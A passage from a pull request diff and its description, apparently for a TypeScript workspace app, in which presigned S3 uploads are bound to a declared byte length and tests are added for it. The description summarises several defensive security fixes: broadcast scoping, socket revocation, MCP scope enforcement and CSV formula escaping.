       expiresAt: new Date(Date.now() + UPLOAD_URL_TTL_SECONDS * 1000).toISOString(),
     };
   }

--- a/packages/services/src/storage/types.ts
+++ b/packages/services/src/storage/types.ts
@@ -24,7 +24,11 @@ export interface DownloadOptions {
 
 export interface StorageDriver {
   readonly name: 's3';
-  createUploadTarget(key: string, contentType: string): Promise<UploadTarget>;
+  createUploadTarget(
+    key: string,
+    contentType: string,
+    contentLength: number,
+  ): Promise<UploadTarget>;
   put(key: string, body: Uint8Array, contentType: string): Promise<void>;
   getUrl(key: string, expiresInSeconds: number, options?: DownloadOptions): Promise<string>;
   delete(key: string): Promise<void>;

--- a/packages/services/tests/storage/round-trip.test.ts
+++ b/packages/services/tests/storage/round-trip.test.ts
@@ -133,7 +133,11 @@ describe.skipIf(!storageConfigured)('presign, PUT and GET against object storage
   for (const upload of UPLOADS) {
     it(`round trips ${upload.contentType} with its content type intact`, async () => {
       const key = `org_round_trip/2026/07/${Bun.randomUUIDv7()}-${upload.name}`;
-      const target = await storage().createUploadTarget(key, upload.contentType);
+      const target = await storage().createUploadTarget(
+        key,
+        upload.contentType,
+        bodyFor(upload.contentType).size,
+      );
       written.push(key);
 
       expect(Object.keys(target.headers)).toEqual(['content-type']);
@@ -170,15 +174,40 @@ describe.skipIf(!storageConfigured)('presign, PUT and GET against object storage
     });
   }
 
+  it('refuses an upload larger than the presigned length and stores nothing', async () => {
+    const key = `org_round_trip/2026/07/${Bun.randomUUIDv7()}-oversized.txt`;
+    const declared = new Blob(['ten bytes!']);
+    const target = await storage().createUploadTarget(key, 'text/plain', declared.size);
+
+    const oversized = await fetch(target.url, {
+      method: target.method,
+      headers: { ...target.headers, origin: PRODUCTION_ORIGIN },
+      body: new Blob([`${'x'.repeat(declared.size * 100)}`]),
+    });
+
+    expect(oversized.status).toBeGreaterThanOrEqual(400);
+    expect(await storage().stat(key)).toBeNull();
+
+    const honest = await fetch(target.url, {
+      method: target.method,
+      headers: { ...target.headers, origin: PRODUCTION_ORIGIN },
+      body: declared,
+    });
+    written.push(key);
+    expect(honest.status).toBe(200);
+    expect((await storage().stat(key))?.size).toBe(declared.size);
+  });
+
   it('stores the content type the client sent, so the client must send the target headers', async () => {
     const key = `org_round_trip/2026/07/${Bun.randomUUIDv7()}-mismatch.pdf`;
-    const target = await storage().createUploadTarget(key, 'application/pdf');
+    const body = bodyFor('application/pdf');
+    const target = await storage().createUploadTarget(key, 'application/pdf', body.size);
     written.push(key);
 
     await fetch(target.url, {
       method: target.method,
       headers: { 'content-type': 'text/html' },
-      body: bodyFor('application/pdf'),
+      body,
     });
 
     expect((await storage().stat(key))?.contentType).toBe('text/html');

--- a/packages/services/tests/storage/storage.test.ts
+++ b/packages/services/tests/storage/storage.test.ts
@@ -128,7 +128,7 @@ describe('S3StorageDriver', () => {
   });
 
   it('presigns a PUT upload target against a path style endpoint', async () => {
-    const target = await driver.createUploadTarget('org_1/2026/03/a.png', 'image/png');
+    const target = await driver.createUploadTarget('org_1/2026/03/a.png', 'image/png', 2048);
     expect(target.url).toContain('http://localhost:9010/orbit-uploads/org_1/2026/03/a.png');
     expect(target.url).toContain('X-Amz-Signature=');
     expect(target.method).toBe('PUT');
@@ -136,9 +136,31 @@ describe('S3StorageDriver', () => {
   });
 
   it('offers one header the browser is allowed to set, and never content-length', async () => {
-    const target = await driver.createUploadTarget('org_1/2026/03/a.pdf', 'application/pdf');
+    const target = await driver.createUploadTarget('org_1/2026/03/a.pdf', 'application/pdf', 2048);
     expect(Object.keys(target.headers)).toEqual(['content-type']);
     expect(target.headers['content-type']).toBe('application/pdf');
+  });
+
+  it('signs the byte length into the url so the object store enforces the size', async () => {
+    const target = await driver.createUploadTarget('org_1/2026/03/a.png', 'image/png', 2048);
+    const signed = new URL(target.url).searchParams.get('X-Amz-SignedHeaders') ?? '';
+
+    expect(signed.split(';')).toContain('content-length');
+    expect(target.maxBytes).toBe(2048);
+  });
+
+  it('refuses to sign an upload past the byte cap or with no length at all', async () => {
+    const tooBig = () =>
+      driver.createUploadTarget('org_1/2026/03/a.png', 'image/png', MAX_UPLOAD_BYTES + 1);
+    await expect(tooBig()).rejects.toThrow(DomainError);
+    await expect(tooBig()).rejects.toMatchObject({ code: 'payload_too_large' });
+
+    await expect(driver.createUploadTarget('org_1/2026/03/a.png', 'image/png', 0)).rejects.toThrow(
+      DomainError,
+    );
+    await expect(
+      driver.createUploadTarget('org_1/2026/03/a.png', 'image/png', 1.5),
+    ).rejects.toThrow(DomainError);
   });
 
   it('presigns a GET download url with the requested ttl', async () => {


### PR DESCRIPTION
Closes the six lower-severity findings left open after #114, plus one more the verification pass turned up.

Every fix here was proven by mutation: the test was watched failing first, and after the fix the production code was deliberately re-broken to confirm the test goes red. An independent verifier re-ran all of it in its own worktree and reproduced every mutation with the same red counts, then ran 17 more the author had not listed.

## The six

1. **Team-restricted projects and milestones were broadcast workspace-wide.** `projectScopes` and `milestoneScopes` attached an org scope, so a project an HTTP reader gets a 404 for was pushed to every member. The org scope could not simply be dropped, or project list updates would stop arriving for everyone, so the reach is now computed from `project_team`: team scopes when the project has teams, the org scope only when it has none, which matches `visibleProjectFilter`, `assertProjectVisible` and the hub's `projectScopeAllowed` exactly. `deleteProject` computes the reach *before* the row cascades away.

2. **Unshared saved views were broadcast org-wide.** A private view now carries its owner alone, and unsharing publishes a delete on the org scope so it leaves everyone else's sidebar rather than going stale there.

3. **Signing out did not close the socket.** Sign-out now publishes a revocation, and a periodic sweep closes sockets whose session has expired. Fails closed.

4. **The `orbit.read` MCP scope was never enforced.** An openid-only token read the entire workspace. `readOnly` is now a required field on `ToolConfig`, all 74 tools are classified (27 read, 47 write), reads require `orbit.read` and writes require a write scope. A scripted scan confirmed no read-flagged tool calls a mutation.

5. **Presigned uploads had no server-enforced size limit.** The upload is now bound to the byte length it declares, so S3 itself rejects an oversized object. Covered by a live MinIO round trip.

6. **The analytics CSV export did not escape formula-leading characters.** A crafted issue title became a live formula in Excel. Values leading with `=`, `+`, `-`, `@`, tab or carriage return are now defused and quoted correctly.

## The one the verification found

The verifier noticed finding 2 was only half closed: the identical `viewScopes` shape was still live in `packages/core/src/analytics/saved-view.ts`, which the branch had not touched, and reproduced it against the real database. A private analytics dashboard was owner-only over REST and broadcast to the whole workspace over the socket, name and config included.

Fixed here with the same rule and seven tests; five of the seven fail if the fix is reverted. Also removes the org scope from the starter project, which is created bound to a team and was the last project insert still announcing itself workspace-wide.

`bun run verify` exits 0: lint, comment policy, byte policy, typecheck and 1916 tests.